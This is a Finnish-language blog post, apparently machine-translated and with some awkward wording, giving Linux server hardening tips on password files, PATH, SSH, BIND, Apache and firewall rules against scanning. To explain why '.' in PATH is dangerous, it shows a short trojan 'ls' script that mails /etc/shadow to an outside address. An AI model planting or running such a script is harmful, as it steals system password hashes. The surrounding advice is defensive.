Turvallisuusvinkkejä Linuxille (palvelimelle) (osa 1)

En ole julkaissut mitään blogissa pitkään aikaan, ja haluaisin jakaa teille joitain neuvoja, jotka on otettu (muun muassa) kirjasta. Löysin sen yliopistosta ja luin juuri, ja vaikka se on rehellisesti hiukan vanhentunutta ja esitetyt tekniikat eivät todennäköisesti toimi järjestelmän kehityksen perusteella, ne ovat myös mielenkiintoisia näkökohtia, jotka voidaan osoittaa. 9788448140502

Haluan selventää, että ne ovat neuvoja, jotka on suunnattu Linux-järjestelmälle, jota käytetään palvelimena keskisuuressa tai kenties suuressa mittakaavassa, koska työpöydän käyttäjätasolla ne eivät kuitenkaan ole kovin hyödyllisiä.

Huomaan myös, että ne ovat yksinkertaisia ​​pikavinkkejä, enkä aio mennä paljon yksityiskohtiin, vaikka aion tehdä toisen paljon tarkemman ja laajemman viestin tietystä aiheesta. Mutta näen sen myöhemmin. Aloitetaan.

Salasanakäytännöt. 

Vaikka se kuulostaa tavalliselta lauseelta, hyvällä salasanakäytännöllä ero on haavoittuvassa järjestelmässä vai ei. Hyökkäykset, kuten "raakaa voimaa", hyödyntävät huonoa salasanaa järjestelmän käyttämiseksi. Yleisimmät vinkit ovat:

  • Yhdistä isot ja pienet kirjaimet.
  • Käytä erikoismerkkejä.
  • Numerot.
  • Yli 6 numeroa (toivottavasti yli 8).

Tämän lisäksi tarkastellaan kahta välttämätöntä tiedostoa.  / etc / passwd ja / etc / shadow.

Jotain erittäin tärkeää on, että tiedosto / etc / passwd. Sen lisäksi, että annat meille käyttäjän nimen, hänen käyttäjätunnuksensa, kansion polun, bash: n jne. joissakin tapauksissa se näyttää myös käyttäjän salatun avaimen.

 Katsotaanpa sen tyypillistä koostumusta.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

käyttäjä: cryptkey: uid: gid: polku :: polku: bash

Todellinen ongelma tässä on, että tällä tiedostolla on käyttöoikeudet -rw-r - r– mikä tarkoittaa, että sillä on lukuoikeudet kaikille järjestelmän käyttäjille. ja salatun avaimen saaminen ei ole kovin vaikeaa tulkita todellista.

Siksi tiedosto on olemassa / etc / shadow. Tämä on tiedosto, johon kaikki käyttäjän avaimet on tallennettu, muun muassa. Tällä tiedostolla on tarvittavat oikeudet, jotta kukaan käyttäjä ei voi lukea sitä.

Tämän korjaamiseksi meidän on mentävä tiedostoon / Etc / passwd ja vaihda salattu avain "x": ksi, tämä vain tallentaa avaimen tiedostoon / etc / shadow.

desdelinux:x:500:501::/home/usuario1:/bin/bash

Ongelmia PATH: n, .bashrc: n ja muiden kanssa.

Kun käyttäjä suorittaa komennon konsolillaan, komentotulkki etsii komentoa PATH-ympäristömuuttujan hakemistoluettelosta.

Jos kirjoitat "echo $ PATH" konsoliin, se tuottaa jotain tällaista.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

Jokainen näistä kansioista kuori etsii komennon, joka on kirjoitettu sen suorittamiseksi. Hän "." se tarkoittaa, että ensimmäinen haettava kansio on sama kansio, josta komento suoritetaan.

Oletetaan, että on käyttäjä "Carlos" ja tämä käyttäjä haluaa "tehdä pahaa". Tämä käyttäjä voi jättää "ls" -nimisen tiedoston pääkansioonsa ja suorittaa tässä tiedostossa seuraavanlaisen komennon:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

Ja jos kohteen pääkäyttäjä yrittää luetella kansiot carlos-kansion sisällä (koska se ensin etsii komentoa samasta kansiosta, vahingossa se lähettäisi tiedoston salasanoilla tähän sähköpostiin ja sitten kansiot näkyisivät luettelossa eikä hän löytänyt asiaa vasta hyvin myöhään.

Tämän välttämiseksi meidän on poistettava "." muuttujan PATH arvosta.

Samalla tavalla tiedostot, kuten /.bashrc, /.bashrc_profile, ./.login, on tarkastettava ja tarkistettava, ettei "" ole ". PATH-muuttujassa ja itse asiassa tämän kaltaisista tiedostoista voit muuttaa tietyn komennon kohteen.

Vinkkejä palveluihin:

SHH

  • Poista ssh-protokollan versio 1 käytöstä sshd_config-tiedostossa.
  • Älä anna pääkäyttäjän kirjautua sisään ssh: llä.
  • Vain pääkäyttäjä voi lukea tiedostot ja kansiot ssh_host_key, ssh_host_dsa_key ja ssh_host_rsa_key.

SITOA

  • Muuta nimetty.conf-tiedoston tervetuloviesti niin, että siinä ei näy versionumeroa
  • Rajoita vyöhykesiirtoja ja ota se käyttöön vain sitä tarvitseville joukkueille.

Apache

  • Estä palvelua näyttämästä versiota tervetuloviestissä. Muokkaa httpd.conf-tiedostoa ja lisää tai muokkaa rivejä:  

ServerSignature Off
ServerTokens Prod

  • Poista automaattinen indeksointi käytöstä
  • Määritä apache olemaan palvelematta arkaluontoisia tiedostoja, kuten .htacces, * .inc, * .jsp .. jne
  • Poista man-sivut tai näyte palvelusta
  • Suorita apache juurtuneessa ympäristössä

Verkkoturvallisuus.

On välttämätöntä kattaa kaikki mahdolliset järjestelmän merkinnät ulkoisesta verkosta, tässä on joitain tärkeitä vinkkejä estämään tunkeilijoita skannaamasta ja saamasta tietoja verkostasi.

Estä ICMP-liikenne

Palomuuri on määritettävä estämään kaiken tyyppinen saapuva ja lähtevä ICMP-liikenne ja kaikuvastaukset. Tällöin vältät, että esimerkiksi skanneri, joka etsii jännitteisiä laitteita IP-alueelta, löytää sinut. 

Vältä TCP-ping-skannausta.

Yksi tapa tarkistaa järjestelmäsi on TCP-ping-skannaus. Oletetaan, että palvelimellasi on Apache-palvelin portissa 80. Tunkeilija voi lähettää ACK-pyynnön kyseiseen porttiin, jolloin jos järjestelmä vastaa, tietokone on elossa ja skannaa muut portit.

Tätä varten palomuurissasi tulisi aina olla vaihtoehto "tilan tietoisuus" ja se tulisi hylätä kaikki ACK-paketit, jotka eivät vastaa jo luotua TCP-yhteyttä tai istuntoa.

Joitakin lisävinkkejä:

  • Käytä IDS-järjestelmiä havaitaksesi porttiskannaukset verkkoosi.
  • Määritä palomuuri siten, että se ei luota yhteyden lähdeportin asetuksiin.

Tämä johtuu siitä, että jotkut skannaukset käyttävät "väärennettyä" lähdeporttia, kuten 20 tai 53, koska monet järjestelmät luottavat näihin portteihin, koska ne ovat tyypillisiä ftp: lle tai DNS: lle.

HUOMAUTUS: Muista, että suurin osa tässä viestissä ilmoitetuista ongelmista on jo ratkaistu lähes kaikissa nykyisissä jakeluissa. Mutta ei koskaan satuta saada avaintietoja näistä ongelmista, jotta ne eivät tapahtuisi sinulle.

HUOMAUTUS: Myöhemmin näen tietyn aiheen ja teen viestin, jossa on paljon yksityiskohtaisempia ja ajankohtaisempia tietoja.

Kiitos kaikille lukemiselle.

Tervehdys.


Artikkelin sisältö noudattaa periaatteita toimituksellinen etiikka. Ilmoita virheestä napsauttamalla täällä.

Kommentti, jätä sinun

Jätä kommentti

Sähköpostiosoitettasi ei julkaista.

*

*

  1. Vastuussa tiedoista: Miguel Ángel Gatón
  2. Tietojen tarkoitus: Roskapostin hallinta, kommenttien hallinta.
  3. Laillistaminen: Suostumuksesi
  4. Tietojen välittäminen: Tietoja ei luovuteta kolmansille osapuolille muutoin kuin lain nojalla.
  5. Tietojen varastointi: Occentus Networks (EU) isännöi tietokantaa
  6. Oikeudet: Voit milloin tahansa rajoittaa, palauttaa ja poistaa tietojasi.

  1.   informatiivinen dijo

    Pidin todella artikkelista ja olen kiinnostunut aiheesta. Kehotan teitä jatkamaan sisällön lataamista.